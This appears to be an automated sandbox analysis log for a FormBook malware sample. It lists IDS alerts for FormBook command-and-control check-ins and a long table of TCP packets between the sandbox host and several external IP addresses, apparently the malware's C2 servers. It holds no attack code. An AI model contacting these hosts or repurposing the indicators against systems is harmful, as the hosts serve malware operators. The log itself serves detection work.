2025-01-13T10:21:38.712173+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50036	199.59.243.228	80	TCP
2025-01-13T10:21:45.554645+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50037	38.22.89.164	80	TCP
2025-01-13T10:21:48.114873+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50038	38.22.89.164	80	TCP
2025-01-13T10:21:50.739579+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50039	38.22.89.164	80	TCP
2025-01-13T10:22:13.142898+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50040	38.22.89.164	80	TCP
2025-01-13T10:22:13.142898+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50040	38.22.89.164	80	TCP
2025-01-13T10:22:19.123445+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50041	68.65.122.71	80	TCP
2025-01-13T10:22:21.584686+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50042	68.65.122.71	80	TCP
2025-01-13T10:22:24.168711+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50043	68.65.122.71	80	TCP
2025-01-13T10:22:27.222582+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50044	68.65.122.71	80	TCP
2025-01-13T10:22:27.222582+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50044	68.65.122.71	80	TCP
2025-01-13T10:22:51.061567+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50045	103.174.136.137	80	TCP
2025-01-13T10:22:53.606826+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50046	103.174.136.137	80	TCP
2025-01-13T10:22:56.176459+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50047	103.174.136.137	80	TCP
2025-01-13T10:22:58.700369+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50048	103.174.136.137	80	TCP
2025-01-13T10:22:58.700369+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50048	103.174.136.137	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 10:19:31.312290907 CET	49736	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:19:31.317284107 CET	80	49736	199.59.243.228	192.168.2.4
Jan 13, 2025 10:19:31.317414999 CET	49736	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:19:31.328170061 CET	49736	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:19:31.333024025 CET	80	49736	199.59.243.228	192.168.2.4
Jan 13, 2025 10:19:31.792589903 CET	80	49736	199.59.243.228	192.168.2.4
Jan 13, 2025 10:19:31.792609930 CET	80	49736	199.59.243.228	192.168.2.4
Jan 13, 2025 10:19:31.792623997 CET	80	49736	199.59.243.228	192.168.2.4
Jan 13, 2025 10:19:31.792823076 CET	49736	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:19:31.796835899 CET	49736	80	192.168.2.4	199.59.243.228
Jan 13, 2025 10:19:31.801593065 CET	80	49736	199.59.243.228	192.168.2.4
Jan 13, 2025 10:19:55.025546074 CET	49779	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:55.030385017 CET	80	49779	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:55.030467987 CET	49779	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:55.045418024 CET	49779	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:55.050215006 CET	80	49779	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:55.500876904 CET	80	49779	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:55.501082897 CET	80	49779	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:55.501146078 CET	49779	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:56.551837921 CET	49779	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:57.570677996 CET	49795	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:57.575565100 CET	80	49795	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:57.575700045 CET	49795	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:57.595248938 CET	49795	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:57.600143909 CET	80	49795	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:58.027172089 CET	80	49795	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:58.027595997 CET	80	49795	104.21.13.141	192.168.2.4
Jan 13, 2025 10:19:58.027662992 CET	49795	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:19:59.098654985 CET	49795	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:00.117609978 CET	49812	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:00.122473955 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.122621059 CET	49812	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:00.138780117 CET	49812	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:00.143635035 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143657923 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143678904 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143697977 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143728018 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143739939 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143774033 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143827915 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.143841982 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.595264912 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.595609903 CET	80	49812	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:00.595689058 CET	49812	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:01.646111012 CET	49812	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:02.665925026 CET	49832	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:02.670767069 CET	80	49832	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:02.670917988 CET	49832	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:02.680124044 CET	49832	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:02.685005903 CET	80	49832	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:03.318764925 CET	80	49832	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:03.318840981 CET	80	49832	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:03.318892002 CET	80	49832	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:03.318941116 CET	49832	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:03.318941116 CET	49832	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:03.321870089 CET	49832	80	192.168.2.4	104.21.13.141
Jan 13, 2025 10:20:03.326618910 CET	80	49832	104.21.13.141	192.168.2.4
Jan 13, 2025 10:20:08.496689081 CET	49868	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:08.501540899 CET	80	49868	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:08.501629114 CET	49868	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:08.517261028 CET	49868	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:08.521991014 CET	80	49868	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:10.033463001 CET	49868	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:10.038507938 CET	80	49868	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:10.038707972 CET	49868	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:11.039274931 CET	49884	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:11.044130087 CET	80	49884	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:11.044219017 CET	49884	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:11.059544086 CET	49884	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:11.064327955 CET	80	49884	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:11.527442932 CET	80	49884	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:11.527614117 CET	80	49884	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:11.527719021 CET	49884	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:12.568088055 CET	49884	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:13.586261034 CET	49896	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:13.591017008 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.591097116 CET	49896	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:13.607990026 CET	49896	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:13.612782001 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612822056 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612878084 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612886906 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612921000 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612929106 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612982035 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.612991095 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:13.613030910 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:15.114686966 CET	49896	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:15.119632959 CET	80	49896	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:15.120701075 CET	49896	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:16.133178949 CET	49916	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:16.138078928 CET	80	49916	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:16.138160944 CET	49916	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:16.148545027 CET	49916	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:16.153337002 CET	80	49916	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:17.600891113 CET	80	49916	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:17.600969076 CET	80	49916	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:17.601041079 CET	49916	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:17.603724957 CET	49916	80	192.168.2.4	15.197.240.20
Jan 13, 2025 10:20:17.608587027 CET	80	49916	15.197.240.20	192.168.2.4
Jan 13, 2025 10:20:22.667680025 CET	49957	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:22.672538996 CET	80	49957	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:22.672619104 CET	49957	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:22.697398901 CET	49957	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:22.702379942 CET	80	49957	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:23.330616951 CET	80	49957	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:23.330818892 CET	80	49957	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:23.330918074 CET	49957	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:24.208494902 CET	49957	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:25.227535963 CET	49977	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:25.232439041 CET	80	49977	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:25.232517004 CET	49977	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:25.251497030 CET	49977	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:25.256942034 CET	80	49977	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:25.887921095 CET	80	49977	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:25.887937069 CET	80	49977	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:25.888137102 CET	49977	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:27.076966047 CET	49977	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:28.086534023 CET	49994	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:28.091320038 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.091470957 CET	49994	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:28.110378981 CET	49994	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:28.115386963 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115401983 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115411997 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115422010 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115431070 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115442038 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115458965 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115468025 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.115475893 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.783087015 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.783102036 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.783123970 CET	80	49994	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:28.783179045 CET	49994	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:28.783179045 CET	49994	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:29.617989063 CET	49994	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:30.634349108 CET	50010	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:30.639128923 CET	80	50010	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:30.639267921 CET	50010	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:30.654356956 CET	50010	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:30.659162045 CET	80	50010	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:31.291377068 CET	80	50010	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:31.291857958 CET	80	50010	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:31.291949987 CET	50010	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:31.295644999 CET	50010	80	192.168.2.4	136.243.225.5
Jan 13, 2025 10:20:31.300376892 CET	80	50010	136.243.225.5	192.168.2.4
Jan 13, 2025 10:20:36.322366953 CET	50017	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:36.327219963 CET	80	50017	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:36.330503941 CET	50017	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:36.354372978 CET	50017	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:36.359155893 CET	80	50017	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:36.981306076 CET	80	50017	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:36.981642008 CET	80	50017	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:36.981692076 CET	50017	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:37.864353895 CET	50017	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:38.884259939 CET	50018	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:38.889213085 CET	80	50018	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:38.889313936 CET	50018	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:38.907929897 CET	50018	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:38.912755966 CET	80	50018	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:39.552984953 CET	80	50018	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:39.553509951 CET	80	50018	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:39.553567886 CET	50018	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:40.411190033 CET	50018	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:41.430692911 CET	50019	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:41.435558081 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.435635090 CET	50019	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:41.455413103 CET	50019	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:41.460319996 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460340977 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460374117 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460388899 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460417986 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460433006 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460455894 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460490942 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:41.460505962 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:42.086296082 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:42.087299109 CET	80	50019	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:42.087544918 CET	50019	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:42.958076000 CET	50019	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:43.986399889 CET	50020	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:43.991276026 CET	80	50020	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:43.994621992 CET	50020	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:44.006392002 CET	50020	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:44.011642933 CET	80	50020	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:44.644236088 CET	80	50020	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:44.644506931 CET	80	50020	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:44.644673109 CET	50020	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:44.647389889 CET	50020	80	192.168.2.4	104.21.18.171
Jan 13, 2025 10:20:44.652240038 CET	80	50020	104.21.18.171	192.168.2.4
Jan 13, 2025 10:20:49.680226088 CET	50021	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:49.685075045 CET	80	50021	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:49.685204983 CET	50021	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:49.702526093 CET	50021	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:49.707386017 CET	80	50021	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:50.329318047 CET	80	50021	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:50.329421997 CET	80	50021	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:50.329478979 CET	50021	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:51.208096981 CET	50021	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:52.228018999 CET	50022	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:52.232985973 CET	80	50022	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:52.233073950 CET	50022	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:52.251660109 CET	50022	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:52.256536007 CET	80	50022	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:52.838083029 CET	80	50022	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:52.838155031 CET	80	50022	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:52.838344097 CET	50022	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:53.755023956 CET	50022	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:54.778424978 CET	50023	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:54.783384085 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.783543110 CET	50023	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:54.798651934 CET	50023	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:54.803529024 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803673983 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803703070 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803755045 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803781033 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803807020 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803833961 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803864956 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:54.803891897 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:55.455426931 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:55.455466032 CET	80	50023	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:55.455625057 CET	50023	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:56.302120924 CET	50023	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:57.324348927 CET	50024	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:57.329292059 CET	80	50024	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:57.329600096 CET	50024	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:57.342422962 CET	50024	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:57.347306013 CET	80	50024	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:57.941283941 CET	80	50024	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:57.941396952 CET	80	50024	199.192.21.169	192.168.2.4
Jan 13, 2025 10:20:57.941443920 CET	50024	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:57.945228100 CET	50024	80	192.168.2.4	199.192.21.169
Jan 13, 2025 10:20:57.950052977 CET	80	50024	199.192.21.169	192.168.2.4
Jan 13, 2025 10:21:03.080718994 CET	50025	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:03.085561991 CET	80	50025	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:03.089515924 CET	50025	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:03.103882074 CET	50025	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:03.109123945 CET	80	50025	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:03.830943108 CET	80	50025	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:03.830969095 CET	80	50025	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:03.831032991 CET	50025	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:04.615011930 CET	50025	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:05.634448051 CET	50026	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:05.639334917 CET	80	50026	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:05.639527082 CET	50026	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:05.655002117 CET	50026	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:05.659946918 CET	80	50026	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:06.369592905 CET	80	50026	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:06.369757891 CET	80	50026	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:06.369859934 CET	50026	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:07.165096045 CET	50026	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:08.181890965 CET	50027	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:08.186899900 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.186995983 CET	50027	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:08.208034039 CET	50027	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:08.213063002 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213095903 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213123083 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213179111 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213206053 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213232994 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213258028 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213340998 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.213368893 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.911401033 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.911475897 CET	80	50027	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:08.914520025 CET	50027	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:09.723784924 CET	50027	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:10.742577076 CET	50028	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:10.747510910 CET	80	50028	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:10.747612000 CET	50028	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:10.758465052 CET	50028	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:10.763277054 CET	80	50028	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:11.475172043 CET	80	50028	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:11.475311041 CET	80	50028	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:11.478583097 CET	50028	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:11.481300116 CET	50028	80	192.168.2.4	45.130.41.107
Jan 13, 2025 10:21:11.486103058 CET	80	50028	45.130.41.107	192.168.2.4
Jan 13, 2025 10:21:16.826560974 CET	50029	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:16.831382990 CET	80	50029	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:16.831471920 CET	50029	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:16.850492001 CET	50029	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:16.855305910 CET	80	50029	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:18.348877907 CET	50029	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:18.353992939 CET	80	50029	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:18.354044914 CET	50029	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:19.370495081 CET	50030	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:19.375394106 CET	80	50030	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:19.375510931 CET	50030	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:19.394483089 CET	50030	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:19.399373055 CET	80	50030	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:20.897525072 CET	50030	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:21.066689968 CET	80	50030	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.066840887 CET	50030	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:21.915040016 CET	50031	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:21.920027971 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.920104980 CET	50031	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:21.941726923 CET	50031	80	192.168.2.4	85.159.66.93
Jan 13, 2025 10:21:21.946698904 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946717978 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946731091 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946737051 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946813107 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946825981 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946847916 CET	80	50031	85.159.66.93	192.168.2.4
Jan 13, 2025 10:21:21.946870089 CET	80	50031	85.159.66.93	192.168.2.4
